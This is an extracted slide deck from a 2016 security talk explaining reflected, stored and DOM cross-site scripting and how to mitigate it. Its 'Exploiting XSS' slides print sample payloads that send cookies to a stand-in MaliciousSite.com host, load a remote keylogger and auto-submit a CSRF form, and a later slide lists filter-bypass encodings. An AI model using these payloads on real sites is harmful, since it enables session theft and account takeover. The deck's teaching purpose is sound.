View
369
Download
1
Embed Size (px)
Citation preview
Cross Site Scripting(XSS)@nullhyd – June’16
#Whoami?• @NahtnahS• Web App Security Guy• Works as Security Analyst• Some HOF & acknowledgements
Current Stats
Experts says
DefinitionCross-Site-Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites.
Source:owasp.org
Anatomy of XSS
Anatomy of XSS
HTML Source Code
Types Of XSS• Reflected • Stored• Dom
Reflected XSS• Reflected attack generally is used to exploit script injection
vulnerabilities via URL in a web application
How it is exploited?Send’s the link to victim
Creates
a
Malicio
us
link
Victim Requests Webpage
Sends data to Attacker
Stored XSS • Stored XSS occurs when the injected script is stored in the
database and is delivered to the visitor of the application
How stored XSS is exploitedCode gets saved into the databaseVictim visits the Infected web page
Sends data to attacker
Injects Malicious Script into web server
Malicious code gets executed in victims browser
DOM XSS• DOM Based XSS is an XSS attack wherein the attack payload is
executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner
Attacks executed by exploiting xss
• Session Hijacking• Redirection• Phishing • Keylogging• CSRF
Exploiting XSS• Redirection :
<script>document.location.href=”http://www.MaliciousSite.com/” </script>
• Session Hijacking<script>document.location.href=”http://www.MaliciousSite.com/cookiestealer.php?cookie=”+document.cookie </script>
• KeyLogging<script src=”http://www.MaliciousSite.com/keylogger.js”> </script>
Exploiting XSS• CSRF
o Page 1:• <form name=”delete”
action="http://yoursite.com/deleteuser"method="post">• <input type="hidden" name="userid" value="1">• <input type=”submit”>• </form>
o Page 2:• “><script>document.form.delete.submit();</script>
Prevention ?• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.
Mitigation• Input validation• Output Encoding:
o < > o < >o (() ())o# &
• Do not use "blacklist" validation• Specify the output encoding • Content Security Policy.
Bypassing XSS FiltersEncoding Techniques works sometimes .Possible ways to represent ‘<‘
<, %3C, <, <, <, < , <, <, <, <, <, < \x3c, \x3C, \u003c, \u003C
DEMO
Questions ?
Thank You!